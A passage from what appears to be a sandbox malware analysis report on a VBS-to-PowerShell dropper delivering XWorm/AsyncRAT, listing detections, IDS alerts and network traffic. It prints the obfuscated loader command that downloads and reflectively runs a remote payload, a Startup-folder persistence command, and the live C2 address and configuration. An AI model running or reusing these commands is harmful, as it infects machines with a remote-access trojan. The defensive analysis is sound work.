XsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\Syst
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", ProcessId: 7752, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\Syst
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", ProcessId: 7752, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7836, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), ProcessId: 7968, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:26:33.410263+020020204241Exploit Kit Activity Detected188.114.96.3443192.168.2.949708TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:26:33.237775+020028410751Malware Command and Control Activity Detected192.168.2.949708188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:26:48.914993+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:26:56.345954+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:08.886340+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:09.959923+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:09.960553+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:09.961307+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:18.905785+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:21.030073+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:33.542279+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:45.733239+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:46.497478+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:48.920023+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:52.076093+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:28:02.892902+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:28:14.326148+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:28:14.326621+020028528701Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:26:56.348028+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:08.917549+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:09.216652+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:09.826591+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:21.031646+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:33.562566+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:45.737886+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:46.499555+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:27:52.082476+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:28:02.894697+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                2024-09-25T15:28:14.327132+020028529231Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:26:48.914993+020028528741Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:18.905785+020028528741Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                2024-09-25T15:27:48.920023+020028528741Malware Command and Control Activity Detected135.224.23.1135555192.168.2.949709TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:26:56.221499+020028559241Malware Command and Control Activity Detected192.168.2.949709135.224.23.1135555TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://paste.ee/d/Sk1Jg/0Avira URL Cloud: Label: malware
                Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpackString decryptor: 135.224.23.113
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpackString decryptor: 5555
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpackString decryptor: <123456789>
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpackString decryptor: <Xwormmm>
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpackString decryptor: XWorm V5.6
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpackString decryptor: USB.exe
                Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.1704495175.000001691101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 135.224.23.113:5555 -> 192.168.2.9:49709
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 135.224.23.113:5555 -> 192.168.2.9:49709
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49709 -> 135.224.23.113:5555
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49709 -> 135.224.23.113:5555
                Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.9:49708 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.9:49708
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 135.224.23.113
                Connects to a pastebin service (likely for C&C)
                Source: unknownDNS query: name: paste.ee
                Uses ping.exe to check the status of other devices and networks
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Yara detected Generic Downloader
                Source: Yara matchFile source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.9:49709 -> 135.224.23.113:5555
                Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /d/Sk1Jg/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: LUCENT-CIOUS LUCENT-CIOUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownTCP traffic detected without corresponding DNS query: 135.224.23.113
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /d/Sk1Jg/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: paste.ee
                Source: powershell.exe, 00000009.00000002.1729309445.00000169798D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsofth
                Source: powershell.exe, 00000009.00000002.1675423746.0000016901679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
                Source: powershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000005.00000002.1513504661.000001618009B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000005.00000002.1513504661.000001618001B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                Source: powershell.exe, 00000005.00000002.1513504661.0000016180069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B00062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                Source: powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000009.00000002.1675423746.000001690100E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
                Source: powershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.000001690100E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                Source: powershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                Source: powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Sk1Jg/0
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49708 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
